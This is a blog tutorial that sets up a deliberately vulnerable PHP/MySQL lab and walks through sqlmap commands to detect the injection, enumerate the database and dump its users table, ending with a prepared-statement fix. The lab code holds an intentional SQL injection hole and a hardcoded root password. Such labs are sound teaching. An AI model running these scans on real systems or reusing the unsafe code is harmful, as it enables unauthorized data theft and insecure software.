
From Install to Injection: Hands-on SQLMap Tutorial on Linux


Disclaimer: This blog is strictly for educational and authorized security testing only. Always obtain written permission before testing any application. Unauthorized testing is illegal.

Introduction


SQL Injection is still one of the most common and dangerous web vulnerabilities. Even today, many internal tools, admin panels, and legacy applications are exposed due to weak input validation.

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It supports almost all popular databases and comes with many advanced features.


In this blog, we will:

  • Set up a vulnerable remote server on RHEL/Rocky Linux

  • Install and configure MySQL + Apache + PHP

  • Create a deliberately vulnerable application

  • Perform step-by-step sqlmap scans

  • Understand sqlmap scan levels, risk, and techniques

  • Learn to read sqlmap output in simple language


Step 1: Prepare the Vulnerable Server


Install required packages

[root@siddhesh ~]# dnf install httpd php php-mysqlnd mariadb-server -y

Enable and start services:

[root@siddhesh ~]# systemctl enable --now httpd mariadb

Allow HTTP in firewall:

[root@siddhesh ~]# firewall-cmd --permanent --add-service=http
[root@siddhesh ~]# firewall-cmd --reload

Step 2: Configure MySQL Database


Secure initial setup:

[root@siddhesh ~]# mysql_secure_installation

Login to MySQL:

[root@siddhesh ~]# mysql -u root -p

Create database and table:

CREATE DATABASE builddevops;
USE builddevops;

CREATE TABLE users (
  id INT AUTO_INCREMENT PRIMARY KEY,
  username VARCHAR(50),
  password VARCHAR(50)
);

INSERT INTO users (username, password) VALUES
('admin','admin123'),
('john','john@123'),
('siddhesh','demo@123');
exit;

Exit MySQL.


Step 3: Create Vulnerable PHP Application


Create file:

[root@siddhesh ~]# vim /var/www/html/user.php

Vulnerable code (intentionally unsafe):

<?php
$conn = new mysqli("localhost","root","Build@123","builddevops");
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id=$id";
$result = $conn->query($query);
while($row = $result->fetch_assoc()){
  echo "User: ".$row['username']."<br>";
}
?>

Restart Apache:

[root@siddhesh ~]# systemctl restart httpd

Test in browser:

Sample output from my browser:


Web browser showing an insecure connection warning with the URL 13.228.29.70/user.php?id=3. The page displays the text "User: siddhesh."

Step 4: Install sqlmap (Attacker Side)


On another RHEL/Rocky or testing VM:

[root@siddhesh ~]# dnf install git python3 -y
[root@siddhesh ~]# git clone https://github.com/sqlmapproject/sqlmap.git
[root@siddhesh ~]# cd sqlmap

Run sqlmap:

[root@siddhesh ~]# python3 sqlmap.py --version

Step 5: Basic SQL Injection Detection


Target URL:

Basic scan:

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1"

What sqlmap does here:

  • Checks if parameter id is injectable

  • Tries boolean-based, error-based, and time-based injections

  • Automatically fingerprints the database


If vulnerable, sqlmap will say:

Parameter 'id' appears to be injectable
Screenshot: sqlmap output; the highlighted part notes that GET parameter 'id' is vulnerable and injectable.

Step 6: Enumerating Database Information


Get database name

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --dbs

Get tables

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" -D builddevops --tables

Get columns

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" -D builddevops -T users --columns

Dump data

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" -D builddevops -T users --dump


Step 7: Understanding --level and --risk


--level (1 to 5)


Controls how many parameters sqlmap tests.


  • Level 1: Basic GET/POST parameters

  • Level 3: Headers like User-Agent, Referer

  • Level 5: Cookies and deep testing


Example:

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --level=5

--risk (1 to 3)


Controls how aggressive payloads are.

  • Risk 1: Safe

  • Risk 2: Medium

  • Risk 3: Heavy queries (may affect DB)


Example:

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --risk=3


Step 8: OS and DB Access


Get DB user

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --current-user

Get DB privileges

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --privileges



Step 9: Best Practices


  • Never test production systems without approval

  • Start with low risk and level

  • Monitor DB load during testing

  • Use sqlmap logs for reports


How to Fix SQL Injection


Vulnerable code:

$query = "SELECT * FROM users WHERE id=$id";

Secure code:

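// The ? placeholder keeps user input out of the SQL text; "i" binds $id as an integer
$stmt = $conn->prepare("SELECT * FROM users WHERE id=?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result(); // fetch rows as before with $result->fetch_assoc()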
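
A complete hardened user.php for this lab, as an added example that is not part of the original post: it combines the prepared statement with integer validation of id, HTML-escaped output, and a non-root database account. The 'webapp' account and the DB_PASSWORD environment variable are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the lab's user.php.
// Make mysqli throw mysqli_sql_exception instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Accept only a positive integer; filter_input() returns null when the
// parameter is missing and false when it is not a valid integer.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT,
                   ['options' => ['min_range' => 1]]);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('Invalid id');
}

try {
    // Assumption: 'webapp' is a database account granted only SELECT on
    // builddevops.users, and its password is supplied through the
    // DB_PASSWORD environment variable rather than hardcoded in the script.
    $conn = new mysqli('localhost', 'webapp',
                       getenv('DB_PASSWORD') ?: '', 'builddevops');

    // Select only the column the page displays; the value is bound, never
    // concatenated into the SQL string.
    $stmt = $conn->prepare('SELECT username FROM users WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $result = $stmt->get_result(); // available because php-mysqlnd is installed

    while ($row = $result->fetch_assoc()) {
        // Escape on output so stored data cannot inject markup into the page.
        echo 'User: ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8') . '<br>';
    }
} catch (mysqli_sql_exception $e) {
    // Log details server-side; do not return database errors to the client.
    error_log('user.php: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error');
}
```

Re-running the Step 5 scan against this version is a quick regression check that the id parameter is no longer reported as injectable.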

Conclusion

sqlmap is a powerful tool when used responsibly. This hands-on lab on RHEL/Rocky/Kali Linux helps you understand how attackers think and how defenders should fix applications.



